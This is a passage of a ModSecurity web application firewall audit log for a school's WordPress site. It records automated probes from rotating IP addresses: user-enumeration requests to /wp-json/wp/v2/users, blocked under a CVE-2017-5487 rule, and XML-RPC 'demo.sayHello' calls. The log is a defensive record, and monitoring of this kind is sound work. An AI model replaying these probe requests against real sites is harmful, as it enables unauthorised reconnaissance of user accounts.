"/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747500065587075 1776 (- - -) Stopwatch2: 1747500065587075 1776; combined=968, p1=315, p2=630, p3=0, p4=0, p5=23, sr=52, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1ca93571-Z-- --78966f17-A-- [17/May/2025:23:41:07 +0700] aCi8IwTOsBn9MSWb6WIZqgAAAIk 103.236.140.4 50946 103.236.140.4 8181 --78966f17-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.79.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.79.110 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --78966f17-C-- demo.sayHello --78966f17-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --78966f17-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747500067073966 6063 (- - -) Stopwatch2: 1747500067073966 6063; combined=4589, p1=601, p2=3747, p3=40, p4=41, p5=96, sr=86, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --78966f17-Z-- --d3470c5b-A-- [17/May/2025:23:41:14 +0700] aCi8KgTOsBn9MSWb6WIaIQAAAIU 103.236.140.4 51492 103.236.140.4 8181 --d3470c5b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.35.25 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.35.25 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d3470c5b-C-- demo.sayHello --d3470c5b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d3470c5b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747500074934477 4500 (- - -) Stopwatch2: 1747500074934477 4500; combined=3223, p1=564, p2=2486, p3=29, p4=27, p5=68, sr=64, sw=49, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d3470c5b-Z-- --1d0d9214-A-- [17/May/2025:23:41:30 +0700] aCi8OnyxdQCiyU1ENFfjngAAAAE 103.236.140.4 52570 103.236.140.4 8181 --1d0d9214-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.84.41 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.84.41 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1d0d9214-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1d0d9214-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747500090048318 3189 (- - -) Stopwatch2: 1747500090048318 3189; combined=1452, p1=489, p2=920, p3=0, p4=0, p5=42, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1d0d9214-Z-- --af1cef62-A-- [17/May/2025:23:41:38 +0700] aCi8QnyxdQCiyU1ENFfjyQAAABI 103.236.140.4 53152 103.236.140.4 8181 --af1cef62-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.84.41 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.84.41 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --af1cef62-C-- demo.sayHello --af1cef62-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --af1cef62-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747500098155754 5135 (- - -) Stopwatch2: 1747500098155754 5135; combined=3353, p1=556, p2=2606, p3=25, p4=28, p5=80, sr=67, sw=58, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --af1cef62-Z-- --dbd01f5d-A-- [17/May/2025:23:42:38 +0700] aCi8fnyxdQCiyU1ENFfldwAAABA 103.236.140.4 57130 103.236.140.4 8181 --dbd01f5d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.173.162 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.173.162 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --dbd01f5d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dbd01f5d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747500158480443 3054 (- - -) Stopwatch2: 1747500158480443 3054; combined=1569, p1=490, p2=1053, p3=0, p4=0, p5=26, sr=59, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dbd01f5d-Z-- --870c304d-A-- [17/May/2025:23:42:52 +0700] aCi8jOm4kjNN-hEbWjLo6gAAAFM 103.236.140.4 57858 103.236.140.4 8181 --870c304d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.173.162 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.173.162 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --870c304d-C-- demo.sayHello --870c304d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --870c304d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747500172455405 4963 (- - -) Stopwatch2: 1747500172455405 4963; combined=3616, p1=457, p2=2972, p3=27, p4=28, p5=76, sr=58, sw=56, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --870c304d-Z-- --e909e64c-A-- [17/May/2025:23:46:02 +0700] aCi9ShKi5m5upc8uMd5pwQAAANg 103.236.140.4 37898 103.236.140.4 8181 --e909e64c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.203.75 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.203.75 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e909e64c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e909e64c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747500362693469 2959 (- - -) Stopwatch2: 1747500362693469 2959; combined=1495, p1=469, p2=1000, p3=0, p4=0, p5=26, sr=59, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e909e64c-Z-- --67871d54-A-- [17/May/2025:23:46:13 +0700] aCi9VQTOsBn9MSWb6WIg2gAAAIU 103.236.140.4 38516 103.236.140.4 8181 --67871d54-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.203.75 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.203.75 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --67871d54-C-- demo.sayHello --67871d54-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --67871d54-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747500373709725 6317 (- - -) Stopwatch2: 1747500373709725 6317; combined=5038, p1=700, p2=4066, p3=44, p4=61, p5=98, sr=60, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --67871d54-Z-- --b4fe5456-A-- [17/May/2025:23:48:16 +0700] aCi90ATOsBn9MSWb6WIjZgAAAIY 103.236.140.4 43752 103.236.140.4 8181 --b4fe5456-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.84.147 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.84.147 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b4fe5456-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b4fe5456-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747500496628885 3281 (- - -) Stopwatch2: 1747500496628885 3281; combined=1514, p1=518, p2=961, p3=0, p4=0, p5=35, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b4fe5456-Z-- --706c0e58-A-- [17/May/2025:23:48:23 +0700] aCi91wTOsBn9MSWb6WIjwAAAAI0 103.236.140.4 44146 103.236.140.4 8181 --706c0e58-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.84.147 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.84.147 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --706c0e58-C-- demo.sayHello --706c0e58-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --706c0e58-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747500503433246 4983 (- - -) Stopwatch2: 1747500503433246 4983; combined=3559, p1=476, p2=2891, p3=29, p4=31, p5=78, sr=69, sw=54, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --706c0e58-Z-- --23d61232-A-- [17/May/2025:23:56:00 +0700] aCi_oOm4kjNN-hEbWjL3dwAAAEc 103.236.140.4 41138 103.236.140.4 8181 --23d61232-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.60.50 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.60.50 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --23d61232-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --23d61232-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747500960262191 2309 (- - -) Stopwatch2: 1747500960262191 2309; combined=953, p1=352, p2=579, p3=0, p4=0, p5=22, sr=54, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --23d61232-Z-- --877b6165-A-- [17/May/2025:23:56:08 +0700] aCi_qATOsBn9MSWb6WIvngAAAJA 103.236.140.4 41596 103.236.140.4 8181 --877b6165-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.60.50 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.60.50 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --877b6165-C-- demo.sayHello --877b6165-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --877b6165-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747500968600082 5255 (- - -) Stopwatch2: 1747500968600082 5255; combined=4256, p1=570, p2=3480, p3=39, p4=50, p5=71, sr=54, sw=46, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --877b6165-Z-- --148dee3d-A-- [17/May/2025:23:56:14 +0700] aCi_rgTOsBn9MSWb6WIv3wAAAIM 103.236.140.4 41930 103.236.140.4 8181 --148dee3d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.86.75 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.86.75 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --148dee3d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --148dee3d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747500974688058 2221 (- - -) Stopwatch2: 1747500974688058 2221; combined=1141, p1=385, p2=731, p3=0, p4=0, p5=25, sr=112, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --148dee3d-Z-- --01ad9a08-A-- [17/May/2025:23:56:22 +0700] aCi_tum4kjNN-hEbWjL37gAAAFg 103.236.140.4 42322 103.236.140.4 8181 --01ad9a08-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.86.75 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.86.75 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --01ad9a08-C-- demo.sayHello --01ad9a08-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --01ad9a08-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747500982657075 4775 (- - -) Stopwatch2: 1747500982657075 4775; combined=3382, p1=521, p2=2671, p3=27, p4=29, p5=79, sr=60, sw=55, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --01ad9a08-Z-- --4d5ac57d-A-- [17/May/2025:23:56:22 +0700] aCi_tum4kjNN-hEbWjL38AAAAFM 103.236.140.4 42340 103.236.140.4 8181 --4d5ac57d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.44.253 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.44.253 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4d5ac57d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4d5ac57d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747500982890822 2743 (- - -) Stopwatch2: 1747500982890822 2743; combined=1238, p1=441, p2=768, p3=0, p4=0, p5=29, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4d5ac57d-Z-- --16eff404-A-- [17/May/2025:23:56:29 +0700] aCi_vXyxdQCiyU1ENFf2BQAAABY 103.236.140.4 42674 103.236.140.4 8181 --16eff404-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.44.253 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.44.253 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --16eff404-C-- demo.sayHello --16eff404-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --16eff404-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747500989751003 5917 (- - -) Stopwatch2: 1747500989751003 5917; combined=4404, p1=708, p2=3478, p3=28, p4=27, p5=94, sr=66, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
